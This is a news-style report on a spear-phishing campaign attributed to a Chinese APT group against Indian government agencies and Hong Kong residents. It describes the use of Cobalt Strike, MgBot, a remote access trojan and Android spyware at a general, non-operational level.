A newly discovered cyber attack campaign from a group of Threat Actors that originates from China has been traced to targeting Government Agencies from India and Hong Kong Residents. The attack from the Chinese Hackers were first observed in the first week of July same time that a controversial law was passed in Hong Kong and India’s move to ban 59 Mobile applications from China because of Privacy concerns.
The Cybercriminals behind this attack said to have a “unique phishing attempt” that targets victims in India and Hong Kong. This group has spoken to leverage at least three different Tactics, Techniques, and Procedures (TTPs), to acquire call logs, contact and SMS messages they are using a spear-phishing email to deposit various types of Cobalt Strikes and MgBot malware and other fake Mobile Android Applications.
The target victims in this scheme seem to be the Indian Government and individuals in Hong Kong or at least those who are against the new security law that was issued by China.
On July 2, the first variant was executed informs the victim that their email addresses have been leaked and needs to complete the security check on July 5; the alerted recipients have the “gov.in” domain.
The email attachment “Mail security check.docx” that professedly came from the Indian Government’s Information Security Center employs a template injection to download a remote template and execute a variant of Cobalt Strike.
One day after the attack, threat actors switched from Cobalt Strike to an updated version of MgBot malware.
On the third version, that was executed on July 5 where the researchers observed an APT that is on a different document that states UK Prime Minister Boris Johnson allegedly promises to accept three million Hong Kong residents to their country.
The Dynamic Data Exchange (DDE) is the protocol that allows data to be communicated or shared between Windows applications was used to execute the payload that is encoded inside the documents.
To detect if it is being observed in a virtual environment, it uses anti-VM Detection instructions that can provide information about the processor and check VMware IO ports too. Not only that, but it is also self-modifying, as it alters its codes during its runtime.
The final executable malware is (“pMsrvd.dll”), which is used to perform malicious activities and poses as a “Video Team Desktop App.”
This malware is also bundled with a Remote Administration Trojan (RAT), which can establish a connection to the command-and-control (C2) server located in Hong Kong.
This has the ability to let the Chinese Hackers to capture screenshots, keystrokes, and also manage files and processes.
The researcher was also able to find several malicious Android applications that were made by the same Threat Actors that are equipped with RAT features as well that could record audio and screen activity, triangulate phone’s location and exfiltrate contacts, call logs, SMS, and web history.
As per the researchers, this China APT Group has been active since the year 2014. In all their campaigns, they have used several variants of MgBot to meet specific goals.